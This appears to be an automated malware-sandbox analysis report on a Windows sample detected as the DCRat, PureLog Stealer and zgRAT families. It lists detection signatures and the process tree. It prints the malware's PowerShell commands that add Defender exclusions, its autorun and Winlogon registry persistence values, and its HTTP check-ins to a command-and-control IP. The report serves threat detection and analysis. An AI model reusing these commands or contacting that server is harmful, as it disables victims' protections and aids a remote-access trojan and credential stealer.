Windows Analysis Report
84JufgBTrA.exe

Overview

General Information

Sample name: 84JufgBTrA.exe (renamed because original name is a hash value)
Original sample name: 3c9cf0b38226e2a7f0191a0130536859.exe
Analysis ID: 1511007
MD5: 3c9cf0b38226e2a7f0191a0130536859
SHA1: 87d531257a15e18b50fa341bce9ac3c5a71ba80d
SHA256: 4ac2ddb4fa2d1917ae491b5ac623e7ebf23e5e34667c63e5acd433cc6696c23d
Tags: DCRat, exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 84JufgBTrA.exe (PID: 5300 cmdline: "C:\Users\user\Desktop\84JufgBTrA.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
    • csc.exe (PID: 6388 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 1904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 1368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7928 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6316 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3384 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3140 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7680 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • MaEiPrsQRasQLtRzJjb.exe (PID: 8036 cmdline: "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
    • MaEiPrsQRasQLtRzJjb.exe (PID: 7328 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 1220 cmdline: C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 928 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 2992 cmdline: C:\Recovery\RuntimeBroker.exe MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 7176 cmdline: C:\Recovery\RuntimeBroker.exe MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 8184 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • svchost.exe (PID: 3236 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RuntimeBroker.exe (PID: 7112 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 6696 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 7660 cmdline: "C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 3336 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • MaEiPrsQRasQLtRzJjb.exe (PID: 5268 cmdline: "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • RuntimeBroker.exe (PID: 2380 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 3C9CF0B38226E2A7F0191A0130536859)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| Process Memory Space: 84JufgBTrA.exe PID: 5300 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| Process Memory Space: RuntimeBroker.exe PID: 7112 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.84JufgBTrA.exe.1bb20000.19.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.2.84JufgBTrA.exe.1bb20000.19.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetFilename: C:\Recovery\RuntimeBroker.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', ProcessId: 1368, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\RuntimeBroker.exe, CommandLine: C:\Recovery\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\RuntimeBroker.exe, NewProcessName: C:\Recovery\RuntimeBroker.exe, OriginalFileName: C:\Recovery\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\RuntimeBroker.exe, ProcessId: 2992, ProcessName: RuntimeBroker.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaEiPrsQRasQLtRzJjb
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", ProcessId: 6388, ProcessName: csc.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', ProcessId: 1368, ProcessName: powershell.exe
Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaEiPrsQRasQLtRzJjb
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\84JufgBTrA.exe, ProcessId: 5300, TargetFilename: C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe', ProcessId: 1368, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3236, ProcessName: svchost.exe

Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\84JufgBTrA.exe", ParentImage: C:\Users\user\Desktop\84JufgBTrA.exe, ParentProcessId: 5300, ParentProcessName: 84JufgBTrA.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline", ProcessId: 6388, ProcessName: csc.exe

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-13T21:02:22.831881+0200 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 31.177.108.211 | 80 | TCP |

AV Detection

Source: 84JufgBTrA.exe, Avira: detected
Source: http://31.177.108.211/lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php, Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\DvHnLgjG.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Recovery\RuntimeBroker.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\DNOFZBcI.log, Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, ReversingLabs: Detection: 68%
Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe, ReversingLabs: Detection: 68%
Source: C:\Recovery\RuntimeBroker.exe, ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe, ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\DvHnLgjG.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\FGdoLyOG.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\GbeNbtEV.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\IIQWghSC.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\IeQwxcIQ.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QKxdLVJD.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\VMyCYnho.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\XbctOGCS.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\YKVbAlIQ.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\eqGsIhxV.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\hKwJyjHA.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\kvbZFwSt.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\pMdQdXyB.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\qJFYyXNw.log, ReversingLabs: Detection: 50%
Source: 84JufgBTrA.exe, ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\DvHnLgjG.log, Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DNOFZBcI.log, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exe, Joe Sandbox ML: detected
Source: 84JufgBTrA.exe, Joe Sandbox ML: detected
Source: 84JufgBTrA.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\84JufgBTrA.exe, Directory created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
Source: C:\Users\user\Desktop\84JufgBTrA.exe, Directory created: C:\Program Files\Windows Portable Devices\557bb37d3fa657
Source: 84JufgBTrA.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.pdb source: 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\84JufgBTrA.exe, File opened: C:\Users\user
Source: C:\Users\user\Desktop\84JufgBTrA.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\84JufgBTrA.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\84JufgBTrA.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\84JufgBTrA.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\84JufgBTrA.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\84JufgBTrA.exe, Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 0_2_00007FFD9BA2866D
Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe, Code function: 4x nop then jmp 00007FFD9B8C2656h 41_2_00007FFD9B8C244E
Source: C:\Recovery\RuntimeBroker.exe, Code function: 4x nop then jmp 00007FFD9B8A2656h 48_2_00007FFD9B8A244E
Source: C:\Recovery\RuntimeBroker.exe, Code function: 4x nop then jmp 00007FFD9B8C2656h 50_2_00007FFD9B8C244E
Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe, Code function: 4x nop then jmp 00007FFD9B8B2656h 52_2_00007FFD9B8B244E
Source: C:\Recovery\RuntimeBroker.exe, Code function: 4x nop then jmp 00007FFD9B8A2656h 53_2_00007FFD9B8A244E

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 31.177.108.211:80
                      Source: Joe Sandbox ViewASN Name: UNILINK-ASRU UNILINK-ASRU
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 384Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 384Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 1400Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continue
